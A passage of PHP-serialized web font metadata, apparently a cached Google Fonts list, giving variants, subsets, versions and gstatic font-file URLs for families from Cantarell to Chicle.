\"http://fonts.gstatic.com/s/cantarell/v15/B50LF7ZDq37KMUvlO015iaJuPqqSLJYf.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/cantarell/v15/B50IF7ZDq37KMUvlO01xN4dOFISeJY8GgQ.ttf\";s:9:\"700italic\";s:81:\"http://fonts.gstatic.com/s/cantarell/v15/B50WF7ZDq37KMUvlO015iZrSEY6aB4oWgWHB.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:226;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Cantata One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/cantataone/v15/PlI5Fl60Nb5obNzNe2jslVxEt8CwfGaD.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:227;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Cantora One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/cantoraone/v17/gyB4hws1JdgnKy56GB_JX6zdZ4vZVbgZ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:228;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Capriola\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/capriola/v13/wXKoE3YSppcvo1PDln_8L-AinG8y.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:229;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Caramel\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/caramel/v7/P5sCzZKBbMTf_ShyxCRuiZ-uydg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:230;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Carattere\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/carattere/v7/4iCv6Kp1b9dXlgt_CkvTt2aMH4V_gg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:231;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Cardo\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:5:\"greek\";i:1;s:9:\"greek-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/cardo/v19/wlp_gwjKBV1pqiv_1oAZ2H5O.ttf\";s:6:\"italic\";s:68:\"http://fonts.gstatic.com/s/cardo/v19/wlpxgwjKBV1pqhv93IQ73W5OcCk.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/cardo/v19/wlpygwjKBV1pqhND-aQR82JHaTBX.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:232;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Carme\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/carme/v16/ptRHTiWdbvZIDOjGxLNrxfbZ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:233;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Carrois Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/carroisgothic/v16/Z9XPDmFATg-N1PLtLOOxvIHl9ZmD3i7ajcJ-.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:234;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Carrois Gothic SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/carroisgothicsc/v15/ZgNJjOVHM6jfUZCmyUqT2A2HVKjc-28nNHabY4dN.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:235;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Carter One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/carterone/v17/q5uCsoe5IOB2-pXv9UcNIxR2hYxREMs.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:236;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Castoro\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/castoro/v18/1q2GY5yMCld3-O4cHYhEzOYenEU.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/castoro/v18/1q2EY5yMCld3-O4cLYpOyMQbjEX5fw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:237;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Catamaran\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:92:\"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjc1anXuluiLyw.ttf\";s:3:\"200\";s:92:\"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPPjd1anXuluiLyw.ttf\";s:3:\"300\";s:92:\"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPCbd1anXuluiLyw.ttf\";s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjd1anXuluiLyw.ttf\";s:3:\"500\";s:92:\"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPErd1anXuluiLyw.ttf\";s:3:\"600\";s:92:\"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPKba1anXuluiLyw.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPJ_a1anXuluiLyw.ttf\";s:3:\"800\";s:92:\"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPPja1anXuluiLyw.ttf\";s:3:\"900\";s:92:\"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPNHa1anXuluiLyw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:238;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Caudex\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"greek\";i:1;s:9:\"greek-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/caudex/v15/esDQ311QOP6BJUrIyviAnb4eEw.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/caudex/v15/esDS311QOP6BJUr4yPKEv7sOE4in.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/caudex/v15/esDT311QOP6BJUrwdteklZUCGpG-GQ.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/caudex/v15/esDV311QOP6BJUr4yMo4kJ8GOJSuGdLB.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:239;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Caveat\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/caveat/v17/WnznHAc5bAfYB2QRah7pcpNvOx-pjfJ9SIKjYBxPigs.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/caveat/v17/WnznHAc5bAfYB2QRah7pcpNvOx-pjcB9SIKjYBxPigs.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/caveat/v17/WnznHAc5bAfYB2QRah7pcpNvOx-pjSx6SIKjYBxPigs.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/caveat/v17/WnznHAc5bAfYB2QRah7pcpNvOx-pjRV6SIKjYBxPigs.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:240;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Caveat Brush\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/caveatbrush/v11/EYq0maZfwr9S9-ETZc3fKXtMW7mT03pdQw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:241;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Cedarville Cursive\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:95:\"http://fonts.gstatic.com/s/cedarvillecursive/v17/yYL00g_a2veiudhUmxjo5VKkoqA-B_neJbBxw8BeTg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:242;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Ceviche One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/cevicheone/v16/gyB4hws1IcA6JzR-GB_JX6zdZ4vZVbgZ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:243;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Chakra Petch\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:84:\"http://fonts.gstatic.com/s/chakrapetch/v9/cIflMapbsEk7TDLdtEz1BwkeNIhFQJXE3AY00g.ttf\";s:9:\"300italic\";s:86:\"http://fonts.gstatic.com/s/chakrapetch/v9/cIfnMapbsEk7TDLdtEz1BwkWmpLJQp_A_gMk0izH.ttf\";s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/chakrapetch/v9/cIf6MapbsEk7TDLdtEz1BwkmmKBhSL7Y1Q.ttf\";s:6:\"italic\";s:82:\"http://fonts.gstatic.com/s/chakrapetch/v9/cIfkMapbsEk7TDLdtEz1BwkWmqplarvI1R8t.ttf\";s:3:\"500\";s:84:\"http://fonts.gstatic.com/s/chakrapetch/v9/cIflMapbsEk7TDLdtEz1BwkebIlFQJXE3AY00g.ttf\";s:9:\"500italic\";s:86:\"http://fonts.gstatic.com/s/chakrapetch/v9/cIfnMapbsEk7TDLdtEz1BwkWmpKRQ5_A_gMk0izH.ttf\";s:3:\"600\";s:84:\"http://fonts.gstatic.com/s/chakrapetch/v9/cIflMapbsEk7TDLdtEz1BwkeQI5FQJXE3AY00g.ttf\";s:9:\"600italic\";s:86:\"http://fonts.gstatic.com/s/chakrapetch/v9/cIfnMapbsEk7TDLdtEz1BwkWmpK9RJ_A_gMk0izH.ttf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/chakrapetch/v9/cIflMapbsEk7TDLdtEz1BwkeJI9FQJXE3AY00g.ttf\";s:9:\"700italic\";s:86:\"http://fonts.gstatic.com/s/chakrapetch/v9/cIfnMapbsEk7TDLdtEz1BwkWmpLZRZ_A_gMk0izH.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:244;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Changa\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:85:\"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZy2xQjDp9htf1ZM.ttf\";s:3:\"300\";s:85:\"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZ_OxQjDp9htf1ZM.ttf\";s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZ62xQjDp9htf1ZM.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZ5-xQjDp9htf1ZM.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZ3O2QjDp9htf1ZM.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZ0q2QjDp9htf1ZM.ttf\";s:3:\"800\";s:85:\"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZy22QjDp9htf1ZM.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:245;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Changa One\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/changaone/v18/xfu00W3wXn3QLUJXhzq46AbouLfbK64.ttf\";s:6:\"italic\";s:79:\"http://fonts.gstatic.com/s/changaone/v18/xfu20W3wXn3QLUJXhzq42ATivJXeO67ISw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:246;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Chango\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/chango/v21/2V0cKI0OB5U7WaJyz324TFUaAw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:247;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Charis SIL\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-05-31\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/charissil/v1/oPWK_kV3l-s-Q8govXvKrPrmYjZ2Xn0.ttf\";s:6:\"italic\";s:78:\"http://fonts.gstatic.com/s/charissil/v1/oPWI_kV3l-s-Q8govXvKnPjsZhRzTn2Ozw.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/charissil/v1/oPWJ_kV3l-s-Q8govXvKlEbJRj5dQnSX1ko.ttf\";s:9:\"700italic\";s:82:\"http://fonts.gstatic.com/s/charissil/v1/oPWX_kV3l-s-Q8govXvKnPjU2jtXRlaSxkrMCQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:248;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Charm\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/charm/v10/7cHmv4oii5K0MeYvIe804WIo.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/charm/v10/7cHrv4oii5K0Md6TDss8yn4hnCci.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:249;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Charmonman\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/charmonman/v18/MjQDmiR3vP_nuxDv47jiWJGovLdh6OE.ttf\";s:3:\"700\";s:81:\"http://fonts.gstatic.com/s/charmonman/v18/MjQAmiR3vP_nuxDv47jiYC2HmL9K9OhmGnY.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:250;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Chathura\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"100\";s:75:\"http://fonts.gstatic.com/s/chathura/v20/_gP91R7-rzUuVjim42dEq0SbTvZyuDo.ttf\";s:3:\"300\";s:76:\"http://fonts.gstatic.com/s/chathura/v20/_gP81R7-rzUuVjim42eMiWSxYPp7oSNy.ttf\";s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/chathura/v20/_gP71R7-rzUuVjim418goUC5S-Zy.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/chathura/v20/_gP81R7-rzUuVjim42ecjmSxYPp7oSNy.ttf\";s:3:\"800\";s:76:\"http://fonts.gstatic.com/s/chathura/v20/_gP81R7-rzUuVjim42eAjWSxYPp7oSNy.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:251;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Chau Philomene One\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/chauphilomeneone/v15/55xxezRsPtfie1vPY49qzdgSlJiHRQFsnIx7QMISdQ.ttf\";s:6:\"italic\";s:96:\"http://fonts.gstatic.com/s/chauphilomeneone/v15/55xzezRsPtfie1vPY49qzdgSlJiHRQFcnoZ_YscCdXQB.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:252;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Chela One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/chelaone/v21/6ae-4KC7Uqgdz_JZdPIy31vWNTMwoQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:253;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Chelsea Market\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/chelseamarket/v13/BCawqZsHqfr89WNP_IApC8tzKBhlLA4uKkWk.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:254;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Chenla\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"khmer\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/chenla/v25/SZc43FDpIKu8WZ9eXxfonUPL6Q.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:255;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Cherish\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/cherish/v7/ll88K2mXUyqsDsTN5iDCI6IJjg8.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:256;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Cherry Cream Soda\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/cherrycreamsoda/v21/UMBIrOxBrW6w2FFyi9paG0fdVdRciTd6Cd47DJ7G.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:257;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Cherry Swash\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/cherryswash/v18/i7dNIFByZjaNAMxtZcnfAy58QHi-EwWMbg.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/cherryswash/v18/i7dSIFByZjaNAMxtZcnfAy5E_FeaGy6QZ3WfYg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:258;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Chewy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/chewy/v18/uK_94ruUb-k-wk5xIDMfO-ed.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:259;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Chicle\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9: